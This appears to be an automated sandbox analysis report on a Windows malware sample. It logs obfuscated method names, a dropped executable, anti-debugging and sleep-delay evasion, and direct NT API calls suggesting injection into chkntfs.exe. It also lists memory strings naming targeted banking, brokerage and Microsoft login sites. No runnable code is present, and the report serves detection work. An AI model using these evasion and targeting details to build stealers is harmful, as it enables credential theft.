Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, TFHvvsv69ePy2X2akQ.cs	High entropy of concatenated method names: 'iJXL7lTqJ9', 'maILAdWG0a', 'IiXLq8WqvM', 'YbBLf77yHd', 'tkYLBX3Fif', 'gy3LhPP8QE', 'zVcLyJ9Yju', 'ubCL1soCsj', 'XYKLOkX7S1', 'cV6LoYePct'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, UDhf94o4ucAkwsm0sp.cs	High entropy of concatenated method names: 'f9Rq1yG0W', 'DJbff0drL', 'jEPhaTbqd', 'HujyEE1R5', 'BPrOP1NtM', 'morovODBF', 'UU6sQ30jGZyjNwuV8k', 'nEQFSL3NunNHbZ1dat', 'xSYQDvHlW', 'poTIxWtte'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, A297vOAUIe0qEnXTYd.cs	High entropy of concatenated method names: 'a9RrJNeYXU', 'K1Srg9mrKb', 'sf2r0xMadb', 'IQGrxa8AMT', 'pYyrmi7rBU', 'YvSrVfti0n', 'TrZrusOxQa', 'IAIrP1kaHt', 'hftrNMcGHt', 'wr9rbncfjd'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, EN7XnI15c37fuU7Hp5.cs	High entropy of concatenated method names: 'Y1hKfIOBtc', 'HjfKhcGKVf', 'LmoK1u0bTe', 'rngKOZldVQ', 'gbkKwfKbBL', 'rTHKZPaN6C', 'YRqKMiTl2T', 'CySKQT76gS', 'GoZK5G6d6Y', 'KWoKIRYuml'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, qLqlDin0qbgjcnfC3W.cs	High entropy of concatenated method names: 'TfsQTjjKJy', 'jrbQ3fEcoN', 'pZcQsKNQ2P', 'zt7QvEfapE', 'S9KQJNCHAY', 'A9QQnE9cdG', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, xKGw5U4U0dqk7yQy8K9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YM7IJqfRhK', 'WQPIgbFdNh', 'wTRI0DQ9Jn', 'WgqIxEvbOn', 'D8PImwMxwd', 'BmGIVGAro0', 'FiBIueQYcf'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, Wn4fI4CGsHeONDg1CJ.cs	High entropy of concatenated method names: 'X4IMcGj8cE', 'lDVMeNSyeu', 'ToString', 'O3jMFF67iv', 'mI5MrppEig', 'mllMKytvtK', 'ktmMHB14FW', 'uwdMDWoxtY', 'YhsMLGn6OQ', 'pd7MtIZZld'
Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, n0j6khafNtyqP9fmV3.cs	High entropy of concatenated method names: 'Dispose', 'CK8kNrAsoW', 'u2r832ZQLk', 'LjPjjd69Fv', 'FRpkbSRatW', 'zSxkzCKGgd', 'ProcessDialogKey', 'ge08pewQR9', 'd8G8ksYKn8', 'HMo880mafZ'

Source: C:\Windows\SysWOW64\chkntfs.exe	File created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\chkntfs.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\chkntfs.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\chkntfs.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\chkntfs.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\chkntfs.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\chkntfs.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\chkntfs.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\chkntfs.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\chkntfs.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Memory allocated: D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Memory allocated: 2730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Memory allocated: 2680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Memory allocated: 7380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Memory allocated: 8380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Memory allocated: 8620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Memory allocated: 9620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Memory allocated: 1760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Memory allocated: 3150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Memory allocated: 8720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Memory allocated: 9720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Memory allocated: 98F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Memory allocated: A8F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Thread delayed: delay time: 239874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Thread delayed: delay time: 239765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\chkntfs.exe	Window / User API: threadDelayed 9823			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Window / User API: threadDelayed 912			Jump to behavior

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\chkntfs.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe TID: 5896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836	Thread sleep count: 149 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836	Thread sleep time: -298000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836	Thread sleep count: 9823 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836	Thread sleep time: -19646000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880	Thread sleep time: -39000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880	Thread sleep time: -46500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492	Thread sleep time: -239874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492	Thread sleep time: -239765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 2376	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 7716	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: j77tfG6.14.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: j77tfG6.14.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: j77tfG6.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: j77tfG6.14.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: j77tfG6.14.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: j77tfG6.14.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: chkntfs.exe, 0000000E.00000002.3694875633.00000000029E8000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3709837557.00000000079D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: j77tfG6.14.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: j77tfG6.14.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: j77tfG6.14.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: j77tfG6.14.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 00000012.00000002.1724397618.000002B134CBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: j77tfG6.14.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: j77tfG6.14.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: j77tfG6.14.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: j77tfG6.14.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: j77tfG6.14.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3704528727.000000000163F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: j77tfG6.14.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: j77tfG6.14.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: j77tfG6.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: j77tfG6.14.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: j77tfG6.14.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: j77tfG6.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: j77tfG6.14.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
